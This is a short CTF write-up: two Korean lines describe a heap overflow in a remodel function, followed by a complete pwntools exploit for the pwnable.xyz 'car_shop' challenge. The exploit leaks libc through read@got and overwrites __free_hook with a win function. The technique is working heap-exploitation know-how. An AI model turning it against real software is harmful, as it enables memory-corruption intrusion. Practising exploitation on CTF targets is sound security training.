remodel 함수에서 길이를 갱신하는 과정에서 heap overflow를 낼 수 있다
릭하고 free_hook에다가 win을 넣었다
from pwn import *
# Echo every send/recv on the tube while working on the exploit.
context(log_level="debug")

HOST, PORT = "svc.pwnable.xyz", 30037
p = remote(HOST, PORT)
# Local run kept for reference (binary under the challenge's libc):
#p = process("./car_shop", env = {"LD_PRELOAD" : "./alpine-libc-2.23.so"})

# Challenge libc; its symbol table supplies the offsets used below.
libc = ELF("alpine-libc-2.23.so")
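def buy(idx):
    """Choose menu item 1 (buy) and answer the index prompt with *idx*.

    Args:
        idx: car index to buy; sent as its decimal representation.
    """
    p.recvuntil(b"> ")
    p.sendline(b"1")
    p.recvuntil(b"> ")
    # Encode explicitly: every other helper sends bytes, and passing a str
    # here only works through pwntools' implicit ASCII conversion (which
    # logs a warning).
    p.sendline(str(idx).encode())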
def sell(car):
    """Choose menu item 2 (sell) and supply *car* at the "sell: " prompt.

    Defined for completeness; the exploit sequence in this script never
    calls it.
    """
    exchange = ((b"> ", b"2"), (b"sell: ", car))
    for prompt, reply in exchange:
        p.recvuntil(prompt)
        p.sendline(reply)
def remodel(car, data):
    """Choose menu item 3 (remodel): send the car name, then the new model bytes.

    Args:
        car: bytes answered at the "remodel: " prompt.
        data: bytes answered at the "model: " prompt.
    """
    exchange = (
        (b"> ", b"3"),
        (b"remodel: ", car),
        (b"model: ", data),
    )
    for prompt, reply in exchange:
        p.recvuntil(prompt)
        p.sendline(reply)
def list():
    """Choose menu item 4 (list); the listing is left on the tube for the caller.

    Shadows the builtin ``list`` — kept under this name because the script
    below calls it as such.
    """
    choice = b"4"
    p.recvuntil(b"> ")
    p.sendline(choice)
read_got = 0x601fb0  # read@got in the target binary (value as given in the write-up)
win = 0x400b4e       # win() in the target binary (value as given in the write-up)

# Two purchases: indices 0 and 2.
buy(0)
buy(2)

# Remodel "BMW" with 0x40 filler bytes.
payload = b"A" * 0x40
remodel(b"BMW", payload)

# 0x20 filler bytes followed by the read@got address.
# NOTE(review): per the write-up, remodel's length update can overflow;
# presumably the trailing 8 bytes overwrite an adjacent pointer — confirm
# against the binary.
payload = b"A" * 0x20
payload += p64(read_got)
remodel(b"AA", payload)

# Parse the listing: skip to the first ": ", take text up to the next ": ".
list()
p.recvuntil(b": ")
car_name = p.recvuntil(b": ")
car_name = car_name[:-7]  # drop the last 7 bytes (presumably trailing prompt text) — TODO confirm

# 6 leaked bytes, zero-extended to the 8 bytes u64() requires.
leak = p.recv(6)
leak += b"\x00\x00"
libc_base = u64(leak) - libc.symbols['read']
free_hook = libc.symbols['__free_hook'] + libc_base
log.info("libc_base: " + hex(libc_base))
log.info("free_hook: " + hex(free_hook))

# Remodel the parsed car with 2 bytes, then "AA" with 0xff bytes.
payload = b"A" * 2
remodel(car_name, payload)
payload = b"A" * 0xff
remodel(b"AA", payload)

# Same 0x20-filler shape as earlier, now followed by the __free_hook address.
payload = b"A" * 0x20
payload += p64(free_hook)
remodel(b"A", payload)

# Final remodel: a NUL-leading name and the win address as the model bytes.
remodel(b"\x00", p64(win))
p.interactive()